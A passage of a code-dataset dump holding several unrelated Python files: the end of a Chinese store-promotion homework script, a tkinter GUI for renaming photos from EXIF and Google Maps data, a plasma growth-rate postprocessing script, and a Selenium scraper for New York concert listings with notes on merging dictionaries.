int(input('''是否参加优惠换购活动:\r\n1:满50元,加2元换购一瓶小可乐。\r\n2:满100元,加3元换购一瓶大可乐。\r\n3:满100元,加10元换5公斤面粉。\r\n4:满200元,加10元换一个锅子。\r\n5:满200元,加20元换欧莱雅洗面奶套装。\r\n0:不换购。\r\n请选择:'''))\r\n num = int(num)\r\n if money >= 200 and num == 5:\r\n print('本次消费金额:{}\\n成功换购欧莱雅洗面奶套装'.format(money+20))\r\n break\r\n elif money >=200 and num == 4:\r\n print('本次消费金额:{}\\n成功换购锅子一个'.format(money + 10))\r\n break\r\n elif money >= 100 and num == 3:\r\n print('本次消费金额:{}\\n成功换5公斤面粉'.format(money + 10))\r\n break\r\n elif money >= 100 and num == 2:\r\n print('本次消费金额:{}\\n成功换购一瓶大可乐'.format(money + 3))\r\n break\r\n elif money >= 50 and num == 1:\r\n print('本次消费金额:{}\\n成功换购一瓶小可乐'.format(money + 2))\r\n break\r\n elif num ==0:\r\n print('本次消费金额:{}\\n欢迎下次光临'.format(money))\r\n break\r\n else:\r\n print('本次消费金额不符��参加该活动标准,请重新选择')\r\n\r\n\r\nelse:\r\n print('你输入的信息有误。')","sub_path":"day2_HomeWork/13.py","file_name":"13.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"350006771","text":"import sys\nfrom tkinter import filedialog\nfrom tkinter import messagebox\nfrom tkinter import *\nfrom tkinter.ttk import Frame, Label\nfrom PIL import ImageTk, Image\nimport datetime\nimport jpgcollectinfo\nfrom functools import partial\n\n#EXIF_DB_FILE = \"D:\\\\temp\\\\kepek\\\\exif_db.db\"\n#DEFAULTDIR = \"D:\\\\temp\\\\kepek\\\\\"\n\nEXIF_DB_FILE = \"D:\\\\kepek\\\\2017\\\\201708_Montenegro\\\\exif_db.db\"\nDEFAULTDIR = \"D:\\\\kepek\\\\2017\\\\201708_Montenegro\"\n\n# EXIF_DB_FILE = \"C:\\\\Users\\\\PatrikJelinko\\\\PycharmProjects\\\\jpgrenamer\\\\exif_db.db\"\n# DEFAULTDIR = \"C:\\\\Users\\\\PatrikJelinko\\\\PycharmProjects\\\\kepatnevezo\\\\kepek\\\\\"\n\nCANVAS_WIDTH = 600\nCANVAS_HEIGHT = 400\nCANVAS_BG_COLOUR = 'white'\n\nUI_LEFT = 0\nUI_RIGHT = 1\n# Horizontal SIZE of GRID\nGRID_HSIZE = 5\n\nGOOGLE_RECOMMENDATIONS = 4\n\nclass Publisher:\n # We use the observer pattern. notifier is the Subject where\n # observer object register\n def __init__(self, events):\n \"\"\"\n This is the Subject or the central object which others observe\n We call it publisher here\n :param events: list of string for which you can register yourself and a callback\n \"\"\"\n self.observer_subscribers = {event: dict()\n for event in events}\n\n def observer_get_subscribers(self, event):\n \"\"\" Returns the list of observers (subscribers) for a particular event \"\"\"\n return self.observer_subscribers[event]\n\n def observer_register(self, event, who, callback=None):\n \"\"\"\n :param event: Name of the event\n :param who: which instance is registering to this callback\n :param callback: what function to call in case of dispatch, if none is give we will try to call receive_message\n :return:\n \"\"\"\n print(\"registering observer for {}, who {}, for event {}\".format(self, who, event))\n if callback is None:\n callback = getattr(who, 'receive_message')\n self.observer_get_subscribers(event)[who] = callback\n\n print(\"\\nShowing current registrations\")\n for subscriber, callback in self.observer_get_subscribers(event).items():\n print(\"Event:{} Subscriber:{} Callback:{}\".format(event, subscriber, callback))\n\n def observer_unregister(self, event, who):\n \"\"\" Unregisters an observer for an event \"\"\"\n\n del self.observer_get_subscribers(event)[who]\n\n def observer_dispatch(self, sender, event, message):\n \"\"\" Dispatches the message to the observers about an event using the appropriate callback function \"\"\"\n\n for subscriber, callback in self.observer_get_subscribers(event).items():\n if subscriber != sender:\n print(\"Dispatching message from {} to {}\".format(sender, subscriber))\n callback(message)\n else:\n print(\"Not sending message when sender and subscriber are the same\")\n\n\nclass ImageShowUI:\n\n def __init__(self, renameui_instance, pub):\n \"\"\"\n :param renameui_instance: this is our parent object, we use it's variables\n :param pub: publisher we will send our messages to this guy\n \"\"\"\n\n self.processed_tag_list = renameui_instance.processed_tag_list\n self.current_tag = 0\n self.myside=UI_LEFT\n self.current_row = 0\n self.grid_hsize = renameui_instance.grid_hsize\n self.num_recommendations = renameui_instance.num_recommendations\n self.canvas_width = renameui_instance.canvas_width\n self.canvas_height = renameui_instance.canvas_height\n self.canvas_bg_colour = renameui_instance.canvas_bg_colour\n # We use the observer pattern. Publisher is the central object\n # which will dispatch messages\n self.publisher = pub\n # Main global frame\n self.img_frame = Frame()\n # Canvas to draw into\n self.img_canvas = Canvas()\n # Picture name\n self.lbl_currentpicname = Label()\n\n # Navi frame\n self.navi_frame = Frame()\n # Google buttons\n self.google_buttons = []\n self.create_widgets()\n\n def create_widgets(self):\n self.create_image_area()\n self.create_pictitle()\n self.create_picture_slider()\n self.create_google_buttons()\n\n def create_image_area(self):\n \"\"\"\n This is simply a canvas we will draw here the image\n :return:\n \"\"\"\n self.img_canvas = Canvas(self.img_frame, width=self.canvas_width, height=self.canvas_height,\n bg=self.canvas_bg_colour)\n self.img_canvas.grid(row=0, column=0, rowspan=1, columnspan=self.grid_hsize, padx=5, pady=5)\n self.current_row = self.current_row + 5\n\n def create_pictitle(self):\n self.lbl_currentpicname = Label(self.img_frame, text=\"currentpicname\")\n self.lbl_currentpicname.grid(column=0, row=self.current_row, columnspan=self.grid_hsize )\n self.current_row = self.current_row + 1\n\n def create_picture_slider(self):\n # Creating next row of UI\n # slider for quick navi\n # next and previous buttons\n\n self.navi_frame = Frame(self.img_frame)\n\n btn_start = Button(self.navi_frame, text=\"|<\", command=self.cb_start, anchor=\"e\")\n btn_left = Button(self.navi_frame, text=\"<<\", command=self.cb_left, anchor=\"e\")\n self.scl_quicknavi = Scale(self.navi_frame, orient=HORIZONTAL, length=300,\n from_=1, to=len(self.processed_tag_list), command=self.cb_quicknavi)\n self.scl_quicknavi.set(self.current_tag)\n btn_right = Button(self.navi_frame, text=\">>\", command=self.cb_right, anchor=\"w\")\n btn_last = Button(self.navi_frame, text=\">|\", command=self.cb_last, anchor=\"w\")\n\n btn_start.grid(row=0, column=0)\n btn_left.grid(row=0, column=1)\n\n self.scl_quicknavi.grid(row=0, column=2)\n btn_right.grid(row=0, column=3)\n btn_last.grid(row=0, column=4)\n self.navi_frame.grid(row=self.current_row, column=0, columnspan=self.grid_hsize, padx=5, pady=5)\n self.current_row += 1\n\n def create_google_buttons(self):\n for i in range(self.num_recommendations):\n btn = Button(self.img_frame, text=\"Google{}\".format(i),\n command=partial(self.cb_btn_google, i))\n btn.grid(row=i + 1, columnspan=self.grid_hsize, sticky=\"NSEW\",)\n self.google_buttons.append(btn)\n\n def set_processed_tag_list(self, processed_tag_list):\n self.processed_tag_list = processed_tag_list\n self.scl_quicknavi[\"to\"] = len(self.processed_tag_list)\n\n def cb_btn_google(self, button):\n print(\"Google button pushed, dispatching message to observer:\", self.google_buttons[button][\"text\"].lstrip())\n self.publisher.observer_dispatch(self, 'google_button_pushed', self.google_buttons[button][\"text\"].lstrip())\n\n def draw_image_to_canvas(self, im):\n self.img_canvas.image = ImageTk.PhotoImage(im)\n self.img_canvas.create_image(0, 0, image=self.img_canvas.image, anchor=\"nw\")\n\n def cb_start(self):\n # print(\"cb start\")\n self.current_tag = 0\n self.im = load_image(self.processed_tag_list[self.current_tag][\"myfilename\"])\n self.draw_image_to_canvas(self.im)\n self.update_all_widgets()\n\n def cb_left(self):\n # print(\"cb left\")\n if self.current_tag > 0:\n self.current_tag -= 1\n self.im = load_image(self.processed_tag_list[self.current_tag][\"myfilename\"])\n self.draw_image_to_canvas(self.im)\n self.update_all_widgets()\n\n def cb_right(self):\n # print(\"cb right\")\n if len(self.processed_tag_list) - 1 > self.current_tag:\n self.current_tag += 1\n self.im = load_image(self.processed_tag_list[self.current_tag][\"myfilename\"])\n self.draw_image_to_canvas(self.im)\n self.update_all_widgets()\n\n def cb_last(self):\n # print(\"cb last\")\n if len(self.processed_tag_list) != self.current_tag:\n self.current_tag = len(self.processed_tag_list) - 1\n self.im = load_image(self.processed_tag_list[self.current_tag][\"myfilename\"])\n self.draw_image_to_canvas(self.im)\n self.update_all_widgets()\n\n def cb_quicknavi(self, position):\n if self.current_tag == int(position) - 1:\n # we are at the right position\n pass\n else:\n self.current_tag = int(position) - 1\n try:\n self.publisher.observer_dispatch(self, 'picture_slider_moved',self.current_tag)\n except KeyError:\n print(\"No observer for current object, do nothing\")\n pass\n self.im = load_image(self.processed_tag_list[self.current_tag][\"myfilename\"])\n self.draw_image_to_canvas(self.im)\n self.update_all_widgets()\n # If there is an observer for the slider movement, we have to dispatch a message\n\n def update_all_widgets(self):\n \"\"\"\n Will update all google labels, picture name, slider, settings info\n :return: nothing\n \"\"\"\n\n # Let's get the date of the picture\n try:\n a_date = \" \" + self.processed_tag_list[self.current_tag][\"EXIF DateTimeOriginal\"].printable[:10]\n except KeyError:\n a_date = \"1970:01:01 01:01:01\"\n\n a_date2 = re.sub(\":\", \"\", a_date)\n a_date2 = a_date2 + \"_\"\n\n # Let's update the name of the picture\n self.lbl_currentpicname[\"text\"] = self.processed_tag_list[self.current_tag][\"myfilename\"] + \" \" \\\n + str(self.current_tag + 1) + \" of \" + str(len(self.processed_tag_list))\n\n\n # Try to display the address\n # Can get both Key and Index error\n for i, b in enumerate(self.google_buttons):\n try:\n # print(\"Google{} {}\".format(i, self.processed_tag_list[self.current_tag][\"formatted_address_list\"][i]))\n b[\"text\"] = a_date2 + self.processed_tag_list[self.current_tag][\"formatted_address_list\"][i]\n except (KeyError, IndexError) as e:\n b[\"text\"] = a_date2 + \"\"\n\n # Let's check if we need to move the slider\n if self.scl_quicknavi.get() != self.current_tag+1:\n # Let's move the quick_navi slider to the right location\n # Maybe on a wrong place since can be moved with buttons\n self.scl_quicknavi.set(self.current_tag + 1)\n # We changed slider position, so we need to send an update\n try:\n self.publisher.observer_dispatch(self, 'picture_slider_moved',self.current_tag)\n except KeyError:\n print(\"No observer for current object, do nothing\")\n pass\n\n def observer_picture_slider_moved(self, peers_position):\n \"\"\" If the left picture slider was moved, this call back function repositions the right slider to picture n+1,\n if possible. Reminder: position == currant_tag+1 \"\"\"\n\n print(\"Picture slider moved, message received by observer:\", peers_position)\n if self.myside == UI_LEFT:\n # I am left side, I have to be smaller\n if self.current_tag < int(peers_position):\n print(\"Left is more to the left: do nothing\")\n pass\n else:\n print(\"Left needs to move {} {} \".format(self.current_tag, int(peers_position)))\n self.current_tag = int(peers_position)-1\n self.current_tag = max( self.current_tag, 0 )\n\n elif self.myside == UI_RIGHT:\n # I am the right side, I have to be bigger\n if self.current_tag > int(peers_position):\n print(\"Right is more to the right\")\n pass\n else:\n print(\"Right needs to move {} {} \".format(self.current_tag, int(peers_position)))\n self.current_tag = int(peers_position)+1\n self.current_tag = min(self.current_tag, len(self.processed_tag_list)-1)\n\n\n self.im = load_image(self.processed_tag_list[self.current_tag][\"myfilename\"])\n self.draw_image_to_canvas(self.im)\n self.update_all_widgets()\n\n def receive_message(self, message):\n \"\"\"\n Default observer callback function\n :return:\n \"\"\"\n print(\"{} :received {}\".format(self, message))\n\n def get_currenttag(self):\n return self.current_tag\n\n def goto_tag(self,position):\n self.current_tag=position\n self.update_all_widgets()\n\n\nclass RenameUI:\n def __init__(self, canvas_width, canvas_height, canvas_bg_colour, grid_hsize, num_recommendations, dir, db_file,\n publisher):\n self.root_window = Tk()\n self.dir = dir\n self.db_file = db_file\n self.current_row = 0\n self.grid_hsize = grid_hsize\n self.num_recommendations = num_recommendations\n self.canvas_width = canvas_width\n self.canvas_height = canvas_height\n self.canvas_bg_colour = canvas_bg_colour\n self.lbl_currentpicname = Label()\n # This is a message dispatcher object\n self.publisher = publisher\n\n self.processed_tag_list = jpgcollectinfo.read_list_from_file(db_file)\n\n self.current_tag = 0\n\n self.create_widgets()\n\n self.left_img.cb_start()\n self.right_img.cb_right() # displaying the next picture by default on the right hand side\n\n def create_widgets(self):\n self.create_menu()\n self.create_left_and_right_images()\n self.create_timeslider_rename_area()\n self.create_bottom_info_area()\n\n def create_menu(self):\n # Creating first row of UI\n # This will be the menubar\n self.menu_bar = Menu()\n self.file_menu = Menu(self.menu_bar, tearoff=0)\n\n self.file_menu.add_command(label=\"Select folder ...\", command=self.cb_file)\n self.file_menu.add_command(label=\"Select db file...\", command=self.cb_datafile)\n self.file_menu.add_command(label=\"Save db ...\", command=self.cb_save)\n self.file_menu.add_command(label=\"Quit\", command=exit)\n self.menu_bar.add_cascade(label=\"File\", menu=self.file_menu)\n self.menu_bar.add_cascade(label=\"Scan folder\", command=self.cb_scan)\n self.menu_bar.add_cascade(label=\"Rename source files\", command=self.cb_rename)\n self.menu_bar.add_cascade(label=\"Help\")\n self.root_window.config(menu=self.menu_bar)\n\n def create_left_and_right_images(self):\n self.left_img = ImageShowUI(self, self.publisher)\n self.left_img.myside = UI_LEFT\n self.publisher.observer_register(\"picture_slider_moved\", self.left_img,\n self.left_img.observer_picture_slider_moved)\n\n self.right_img = ImageShowUI(self, self.publisher)\n self.right_img.myside = UI_RIGHT\n self.publisher.observer_register('picture_slider_moved', self.right_img,\n self.right_img.observer_picture_slider_moved)\n\n self.left_frame = self.left_img.img_frame\n self.right_frame = self.right_img.img_frame\n\n self.left_frame.grid(row=0, column=0)\n self.right_frame.grid(row=0, column=1)\n self.current_row = self.current_row + 5\n\n def create_timeslider_rename_area(self):\n\n frame_slider = Frame(self.root_window)\n\n # Creating next row of UI\n # slider for how many to pics display at once\n lbl_a = Label(frame_slider, text=\" Pictures taken within \")\n\n self.scl_withintime = Scale(frame_slider, orient=HORIZONTAL, length=300, to=300,\n command=self.cb_scale_withintime)\n self.scl_withintime.set(15)\n\n self.lbl_numberofpic = Label(frame_slider, text=\" minutes is xxxx.\")\n\n lbl_a.pack(side=LEFT)\n self.scl_withintime.pack(side=LEFT)\n self.lbl_numberofpic.pack(side=LEFT)\n frame_slider.grid(row=self.current_row, columnspan=self.grid_hsize)\n self.current_row += 1\n\n\n\n # Creating next row of UI\n # Rename to part\n frame_rename = Frame(self.root_window)\n\n lbl_renameto = Label(frame_rename, text=\"Rename to\")\n\n\n self.entry_renameto = Entry(frame_rename, text=\"default rename to\", width=100)\n #self.entry_renameto.grid(row=self.current_row, column=1, columnspan=self.grid_hsize - 1)\n\n btn_ok = Button(frame_rename, text=\" OK \", command=self.cb_rename)\n #btn_ok.grid(row=self.current_row, column=4)\n\n lbl_renameto.pack(side=LEFT)\n self.entry_renameto.pack(side=LEFT)\n btn_ok.pack(side=LEFT)\n frame_rename.grid(row=self.current_row, columnspan=self.grid_hsize)\n self.current_row += 1\n\n def create_bottom_info_area(self):\n # Creating next row of UI\n # Name of working folder and DB\n self.lbl_current_settings = Label(self.root_window,\n text=\"Source folder: {} Exif DB file: {}\".format(self.dir, self.db_file))\n\n self.lbl_current_settings.grid(row=self.current_row, column=0, columnspan=self.grid_hsize)\n self.current_row += 1\n\n def cb_scale_withintime(self, position):\n self.update_all_widgets()\n\n def update_all_widgets(self):\n \"\"\"\n Will update all google labels, picture name, slider, settings info\n :return: nothing\n \"\"\"\n count = self.number_of_pics_in_range()\n print(\"Number of pics in range {}\".format(count))\n a_txt = \"minutes is \" + str(count) + \".\"\n self.lbl_numberofpic[\"text\"] = a_txt\n #TODO: uncomment this:\n #cur_pos = self.left_img.get_currenttag()\n #self.right_img.goto_tag(cur_pos + count)\n\n def number_of_pics_in_range(self):\n \"\"\"\n Will return the number of pictures\n from currently showing pic\n to the value of\n :return:\n \"\"\"\n count = 0\n max_delta = int(self.scl_withintime.get())\n\n max_delta = datetime.timedelta(minutes=max_delta).total_seconds()\n self.current_tag=self.left_img.get_currenttag()\n for tag in self.processed_tag_list[self.current_tag:]:\n delta = jpgcollectinfo.timedifference(tag, self.processed_tag_list[self.current_tag])\n if abs(delta.total_seconds()) < max_delta:\n count = count + 1\n return count\n\n def cb_file(self):\n print(\"cb file\")\n self.root_window.filename = filedialog.askdirectory(initialdir=self.dir, title=\"Select folder\")\n print(self.root_window.filename)\n self.dir = self.root_window.filename\n self.update_all_widgets()\n messagebox.showinfo(\"Information\", \"Go and select a DB file then scan\")\n\n def cb_datafile(self):\n print(\"cb data file\")\n self.root_window.dbfilename = filedialog.askopenfilename(initialdir=self.root_window.filename,\n title=\"Select file\",\n filetypes=((\"EXIF db pickle\", \"*.db\"),\n (\"all files\", \"*.*\")))\n if self.root_window.dbfilename == \"\":\n self.db_file = self.dir + \"/\" + \"exif_db.db\"\n else:\n self.db_file = self.root_window.dbfilename\n print(self.db_file)\n self.update_all_widgets()\n\n messagebox.showinfo(\"Information\", \"Check settings below and run scan...\")\n\n def cb_scan(self):\n print(\"cb scan\")\n\n google_api_key = jpgcollectinfo.read_api_key_from_file()\n\n # List the files in JPG_DIR\n filelist = jpgcollectinfo.findjpg(self.dir)\n number_of_files_found = len(filelist)\n print(\"Found {} files to scan\".format(number_of_files_found))\n\n # Load the database file\n # We have data in this DB from the files scanned\n # earlier\n self.processed_tag_list = jpgcollectinfo.read_list_from_file(self.db_file)\n\n # We will narrow down the list of files\n # so we will check only new files not found in our DB\n jpgcollectinfo.remove_processed_files(filelist, self.processed_tag_list)\n print(\"Number of files to process after filtering: {}\".format(len(filelist)))\n\n # Collect EXIF info from all JPG images\n taglist = jpgcollectinfo.gettags(filelist)\n\n # Filter down this list a bit, since I do not need this many info\n # Might want to skip this step\n smalllist = jpgcollectinfo.filtertags(taglist)\n\n # Add decimal GPS info to the list items\n # the new tags will be mylat and mylon\n jpgcollectinfo.add_decimal_GPS(smalllist)\n # Log on to google geomap API\n # to collect \"address\" information based on GPS coordinates\n jpgcollectinfo.add_google_maps_info(smalllist, google_api_key)\n\n # Check\n jpgcollectinfo.printtags(smalllist)\n\n # We will have to concatenate\n # the list of fresh files\n # with the list of already processed files\n if len(self.processed_tag_list) == 0:\n new_processed_list = smalllist\n else:\n new_processed_list = self.processed_tag_list + smalllist\n\n # Sort by date\n jpgcollectinfo.sort_tags_byexifdate(new_processed_list)\n\n # We are working with globals, so we need to have the result in a global var\n self.processed_tag_list = new_processed_list\n\n # update their copy of the working list\n self.left_img.set_processed_tag_list(self.processed_tag_list)\n self.right_img.set_processed_tag_list(self.processed_tag_list)\n # Display the first pic\n self.left_img.cb_start()\n self.right_img.cb_right()\n\n def cb_update_db(self):\n print(\"cb updatedb\")\n # TODO: complete this\n\n def cb_save(self):\n print(\"cb save\")\n jpgcollectinfo.sort_tags_byexifdate(self.processed_tag_list)\n jpgcollectinfo.save_list_to_file(self.processed_tag_list, self.db_file)\n\n def cb_rename(self):\n print(\"cb rename\")\n # TODO: complete this\n\n def observer_google_button_pushed(self, button_text):\n \"\"\" If a google button was pushed, this callback function updates the renameto entry field \"\"\"\n\n print(\"Google button pushed, message received by observer:\", button_text)\n self.entry_renameto.delete(0, END)\n self.entry_renameto.insert(0, button_text)\n self.update_all_widgets()\n\n def observer_picture_slider_moved(self, position):\n self.update_all_widgets()\n\n def receive_message(self, message):\n \"\"\"\n Default observer callback function\n :return:\n \"\"\"\n print(\"{} :received {}\".format(self, message))\n\n\ndef load_image(filename):\n \"\"\"\n Will try to load an image and return a PIL object\n Currently will also resize the image to 20% of orig\n :param filename: name of the file to load\n :return: PIL image\n \"\"\"\n # TODO: APULAI to move this into the class\n try:\n fp = open(filename, \"rb\")\n im = Image.open(fp, \"r\")\n w = im.width\n h = im.height\n r1 = w / CANVAS_WIDTH\n r2 = h / CANVAS_HEIGHT\n\n if r1 > r2:\n if r1 > 1:\n w = w * (1 / r1)\n h = h * (1 / r1)\n else:\n if r2 > 1:\n w = w * (1 / r2)\n h = h * (1 / r2)\n\n size = int(w), int(h)\n # print(size)\n im.thumbnail(size)\n return im\n except IOError:\n print(\"cannot create thumbnail for\", filename)\n return None\n\n\ndef main():\n # We are creating a publisher, where you can subscibe to these events\n pub = Publisher((\"google_button_pushed\", \"picture_slider_moved\"))\n\n c = RenameUI(CANVAS_WIDTH, CANVAS_HEIGHT, CANVAS_BG_COLOUR, GRID_HSIZE, GOOGLE_RECOMMENDATIONS, DEFAULTDIR,\n EXIF_DB_FILE, pub)\n if len(c.processed_tag_list) < 1:\n exit(1)\n pub.observer_register('google_button_pushed', c, c.observer_google_button_pushed)\n pub.observer_register('picture_slider_moved', c, c.observer_picture_slider_moved)\n\n print(c.processed_tag_list[c.current_tag][\"myfilename\"])\n\n messagebox.showinfo(\"Information\", \"You can select a different working directory. \\n Select a DB file. \"\n \"\\n Run Scan \")\n\n # Init the pictures\n # c.left_img.cb_start()\n # c.right_img.cb_right()\n\n c.root_window.mainloop()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"displaythumbs-oo.py","file_name":"displaythumbs-oo.py","file_ext":"py","file_size_in_byte":24555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"475564893","text":"import numpy as np\nimport sys\nfrom scipy.interpolate import splev, splrep\n\ncut = np.loadtxt(\"postproc/exprs_midplane_s00760_cut.dat\", unpack=True)\nder = np.loadtxt(\"postproc/exprs_midplane_s00760_der.dat\", unpack=True)\navg = np.loadtxt(\"postproc/exprs_averaged_s00760.dat\", unpack=True)\navg_der = np.loadtxt(\"postproc/exprs_averaged_s00760_der.dat\", unpack=True)\nqpsin, q = np.loadtxt(\"postproc/qprofile_s00760.dat\", unpack=True)\n\ncut_psin = cut[4][1:]\ncut_der_dp_dpsin = der[5] / 1.e3 # kPa/Tm^2\ncut_R0 = cut[0][1]\ncut_B0 = cut[10][1]\n\navg_psin = avg[0][1:]\navg_currdens = avg[8][1:] / 1.e6 # MA/m^2\navg_der_dp_dpsin = avg_der[3] # Pa/Tm^2\navg_der_dr_dpsin = avg_der[14] # 1/Tm\navg_der_dp_dr = avg_der_dp_dpsin / avg_der_dr_dpsin # Pa/m\navg_der_alpha = avg_der[13]\n\ntck_qprof = splrep(qpsin, q, s=0.000)\navg_qprof = splev(avg_psin, tck_qprof, der=0)\n\navg_alpha = -2. * 4e-7*np.pi * cut_R0 * avg_qprof**2. / cut_B0**2. * avg_der_dp_dr\n\nmax_avg_edge_currdens = np.max(avg_currdens[avg_psin>0.8])\nmax_edge_avg_der_alpha = np.max(avg_der_alpha[avg_psin>0.8])\nmax_edge_avg_alpha = np.max(avg_alpha[avg_psin>0.8])\nmin_edge_cut_dp_dpsi = np.min(cut_der_dp_dpsin[cut_psin>0.8])\n\nt, gm_0, gm_n, gk_0, gk_n = np.loadtxt(str(sys.argv[1]), comments='%', unpack=True)\nwith open(\"macroscopic_vars.dat\") as mv:\n for i, line in enumerate(mv):\n if i == 4:\n n = int(line[11:])\n\nsqrt_mu0_rho0 = 5.6695e-7\nt = t * sqrt_mu0_rho0 * 1e3 # [ms]\ngk_0 = gk_0 / sqrt_mu0_rho0 # [s^-1]\ngk_n = gk_n / sqrt_mu0_rho0 # [s^-1]\ngm_0 = gm_0 / sqrt_mu0_rho0 # [s^-1]\ngm_n = gm_n / sqrt_mu0_rho0 # [s^-1]\n\nt = t[gm_n>0]\ngk_0 = gk_0[gm_n>0]\ngk_n = gk_n[gm_n>0]\ngm_0 = gm_0[gm_n>0]\ngm_n = gm_n[gm_n>0]\n\nt0 = int(np.ceil(t[0]))\n\ngm_0 = gm_0[t>t[0]+0.5]\ngm_n = gm_n[t>t[0]+0.5]\ngk_0 = gk_0[t>t[0]+0.5]\ngk_n = gk_n[t>t[0]+0.5]\nt = t[t>t[0]+0.5]\n\n#print(\"blocks of 100\")\ngm_n_100 = gm_n[0:99]\navg_block = np.mean(gm_n_100)\nstd_block = np.std(gm_n_100)\n#print(\"{0} {1}\".format(avg_block, std_block))\nfor i,gamma in enumerate(gm_n[:-99]):\n gm_n_100 = gm_n[i:i+99]\n local_avg = np.mean(gm_n_100)\n local_std = np.std(gm_n_100)\n if local_std < std_block:\n std_block = local_std\n avg_block = local_avg\n\n#print(\"{0} {1}\".format(avg_block, std_block))\n\nif avg_block > 2.*std_block and std_block < 20000:\n print(\"{0} {1} {2} {3} {4} {5} {6} {7}\".format(t0, n, avg_block, std_block, max_avg_edge_currdens, max_edge_avg_alpha, min_edge_cut_dp_dpsi, max_edge_avg_der_alpha))\nelse:\n print(\"{0} {1} 0.0 0.0 {2} {3} {4} {5}\".format(t0, n, max_avg_edge_currdens, max_edge_avg_alpha, min_edge_cut_dp_dpsi, max_edge_avg_der_alpha))\n\n","sub_path":"scripts/ppiT/growth_rates-avg.py","file_name":"growth_rates-avg.py","file_ext":"py","file_size_in_byte":2945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"259680386","text":"import bs4\nfrom selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException\nfrom collections import defaultdict\nfrom dateutil.parser import parse\n\nfrom itertools import chain\n\n# https://stackoverflow.com/questions/26910708/merging-dictionary-value-lists-in-python\n# https://stackoverflow.com/questions/1720421/how-do-i-concatenate-two-lists-in-python\n\n# ----------------------------\n# How are the results formatted?\n# ----------------------------\n# result_format = {\n# 'DATE' : [\n# {'HEADLINER': ''\n# 'SUPPORT': ''\n# 'VENUE': ''\n# 'TIME': ''\n# 'PRICE': ''\n# }\n# ]\n# }\n# ----------------------------\n# Example result from bb\n# ----------------------------\n# scape_bowery_present_results['6/20/2019'][3] = {\n# 'headliner': 'Cuco',\n# 'support': 'Triathlon',\n# 'venue': 'Brooklyn Steel',\n# 'time': 'Doors 07:00 PM, Show: 08:00 PM',\n# 'price': 'Advance: $25.00 / Day of Show: $25.00'\n# }\n\n\n# ----------------------------\n# Bowery Presents\n# ----------------------------\ndef scape_bowery_present():\n driver = webdriver.Firefox()\n driver.get('https://www.bowerypresents.com/new-york-metro/calendar/')\n\n calendar_days = driver.find_elements_by_class_name('calendar-day')\n\n results = defaultdict(list)\n for day in calendar_days:\n day_title = day.find_element_by_class_name('calendar-day-title').text\n print(day_title)\n # Sanitize date. Example: 'Sunday, June 16' -> '6/16/19'\n # WARNING: dateutil.parser is infering year when it isn't explicit\n day_title = parse(day_title)\n print(day_title)\n day_title = f\"{day_title.month}/{day_title.day}/{day_title.year}\"\n print(day_title)\n\n \n try:\n events = day.find_elements_by_class_name('event-information-wrapper')\n except NoSuchElementException:\n events = None\n\n if events:\n for event in events:\n headliner = event.find_element_by_class_name('event-headliner').text\n support = event.find_element_by_class_name('event-support').text\n venue = event.find_element_by_class_name('event-venue').text\n \n # Note: time and price are not displayed on the page before clicking the element\n # get_attribute('innerText') is used to get the hidden text\n time = event.find_element_by_class_name('calendar-event-details').find_element_by_class_name('event-time').get_attribute('innerText')\n price = event.find_element_by_css_selector('.calendar-event-details .event-text .event-price').get_attribute('innerText')\n\n results[day_title].append({'headliner':headliner, \n 'support':support,\n 'venue':venue,\n 'time':time,\n 'price': price\n })\n driver.close()\n return results\n\n\n# ----------------------------\n# Mercury East\n# ----------------------------\ndef scrape_mercury_east():\n driver = webdriver.Firefox()\n driver.get('http://www.mercuryeastpresents.com/')\n \n event_list = driver.find_elements_by_class_name('titleSize')\n\n results = defaultdict(list)\n for event in event_list:\n headliner = event.find_element_by_class_name('tSize').text\n # Note: sometimes supporting acts are only visable by clicking the element\n support = event.find_element_by_class_name('supports').text\n \n # Note: date needs to be sanitized\n date = event.find_element_by_class_name('eventDate').text\n print(date)\n date = parse(date)\n print(date)\n date = f\"{date.month}/{date.day}/{date.year}\"\n print(date)\n \n venue = event.find_element_by_class_name('venue-name-calendar').text\n # Note: time needs to be sanitized\n time = event.find_element_by_class_name('eventTime').text\n\n # Note: price needs to be sanitized\n price = event.find_element_by_class_name('ticket-price-list').text \n price = price.replace('Price: ','')\n\n results[date].append({'headliner':headliner, \n 'support':support,\n 'venue':venue,\n 'time':time,\n 'price': price\n })\n driver.close()\n return results\n\nbb = scape_bowery_present()\nme = scrape_mercury_east()\n\nbb.keys()\nme.keys()\n\n\n\n# ----------------------------\n# Combine the result dictionaries \n# ----------------------------\n\nresults = defaultdict(list)\nfor k, v in chain(bb.items(), me.items()):\n results[k].extend(v)\n\nme['7/01/2019']\n\ntype(me)\n\nme.keys()\n# ----------------------------\n# Combining Dictionaries v2\n# ----------------------------\n\n# dictionaries with non-equal keys, values all lists for simplicity\none = {'a': [1, 2], 'c': [5, 6], 'b': [3, 4], 'e': [6.2]}\ntwo = {'a': [2.4, 3.4], 'c': [5.6, 7.6], 'b': [3.5, 4.5], 'f': [1.3]}\n\nfrom collections import defaultdict\nfrom itertools import chain\n\ncombi = defaultdict(list)\nfor k,v in chain(one.items(), two.items()):\n combi[k].extend(v) \n\ncombi\n\n\nbirds = ['crow', 'chicken']\nwhales = ['orca', 'blue']\n\n\n\n# https://stackoverflow.com/questions/1720421/how-do-i-concatenate-two-lists-in-python\n\n\n\n# ----------------------------\n# PEP 448 -- Additional Unpacking Generalizations\n# -- Unpacking inside containers \n\n# ----------------------------\n# Example 1 \nx = (*[1,'a'], *[2], 3)\n\n# Example 2 \nl = {'x': 1}\nm = {'y': 2}\nn = {**l, **m}\n\n# Example 3\n(*range(4), 4)\n[*range(4), 4]\n\n# In dictionararies, later values will always override earlier ones \n\n# Old way of combining dictionaries \ncombination = first_dictionary.copy()\ncombination.update({'new_key':'new_value'})\n\n# new way of combining dictionaries \ncombination = {**first_dictionary, 'new_key':'new_value'}\n\n# Function calls continue to have the restriction that keyword argumnets must follow positional arguments \n# ** unpackings must follow * unpackings\n\n# If an argument is given multiple times, such as an argument given both positionally and by keyword -- a TypeError is raised\n\n# Disadvantages\n*elements, = [1,2,3]\nelements = [1,2,3],\n # Duplicate keys in dictionaries allowed. But duplicate keys in function call syntax raises an error\n\n# 